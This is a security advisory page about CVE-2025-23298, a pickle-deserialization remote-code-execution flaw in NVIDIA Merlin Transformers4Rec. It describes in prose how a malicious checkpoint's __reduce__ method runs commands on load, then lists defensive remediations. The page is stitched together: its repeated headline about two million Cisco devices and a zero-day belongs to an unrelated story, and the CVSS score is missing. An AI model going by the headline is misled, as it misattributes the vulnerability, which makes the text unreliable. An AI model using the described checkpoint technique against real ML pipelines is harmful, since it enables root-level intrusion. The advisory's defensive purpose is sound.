Up to 2 Million Cisco Devices Hit by Actively Exploited Zero-Day
September 25, 2025Up to 2 Million Cisco Devices Hit by Actively Exploited Zero-Day
September 25, 2025Severity
High
Analysis Summary
A critical vulnerability (CVE-2025-23298) was discovered in NVIDIA’s Merlin Transformers4Rec library, allowing unauthenticated attackers to achieve remote code execution (RCE) with root privileges. The flaw stems from unsafe deserialization in the load_model_trainer_states_from_checkpoint function, which relies on PyTorch’s torch.load() without safety parameters. Since torch.load() internally uses Python’s pickle module; attackers can craft malicious checkpoint files containing arbitrary code that executes when loaded, posing a severe risk in machine learning (ML) environments where checkpoints are frequently exchanged.
The attack is enabled by the library’s use of cloudpickle to load model classes directly. By defining a custom __reduce__ method in a malicious checkpoint, attackers can execute arbitrary system commands, such as fetching and running remote scripts. This grants them full control of the deserialization process. The danger is amplified because ML practitioners often download pre-trained models from public repositories or cloud sources, and production ML pipelines typically operate with elevated privileges, enabling potential escalation to root-level access.
Researchers demonstrated the flaw by embedding shell commands in a crafted checkpoint, which executed immediately upon loading before any model weights were restored. NVIDIA addressed the issue in pull request #802 by introducing a safer custom load() function that restricts deserialization to approved classes and enforces input validation within serialization.py. Additionally, developers are advised to set weights_only=True when using torch.load() to mitigate exposure to untrusted pickle objects.
The vulnerability affects Merlin Transformers4Rec versions ≤ v1.5.0 and carries a CVSS 3.1 score of (Critical). To reduce risks, organizations are urged to avoid pickle for untrusted data, adopt safer formats such as Safetensors or ONNX, enforce cryptographic signing of model files, and sandbox deserialization processes. More broadly, the ML/AI community must shift toward security-first design principles and phase out pickle-based mechanisms entirely, as their inherent insecurity guarantees that similar RCE vulnerabilities will continue to surface.
Impact
- Privilege Escalation
- Code Execution
- Gain Access
Indicators of Compromise
CVE
CVE-2025-23298
Affected Vendors
- NVIDIA
Affected Products
- NVIDIA Merlin Transformers4Rec
Remediation
- Update to the patched version of NVIDIA Merlin Transformers4Rec (v1.5.1 or later) that replaces unsafe pickle deserialization with a custom load() function.
- Always use weights_only=True when calling torch.load() to restrict deserialization to tensor data and prevent execution of arbitrary objects.
- Avoid using Python’s pickle or cloudpickle for untrusted or third-party checkpoint files.
- Prefer safer model formats such as Safetensors or ONNX for storing and sharing model checkpoints.
- Enforce cryptographic signing and verification of model files before loading them in production ML environments.
- Run ML pipelines and model-serving processes with least privilege (non-root accounts) to reduce the impact of potential exploits.
- Sandbox deserialization operations to isolate potentially unsafe code execution from critical systems.
- Incorporate ML frameworks and model pipelines into regular security audits and supply chain risk assessments.
- Establish policies that mandate a zero-trust approach to external model files and third-party ML artifacts.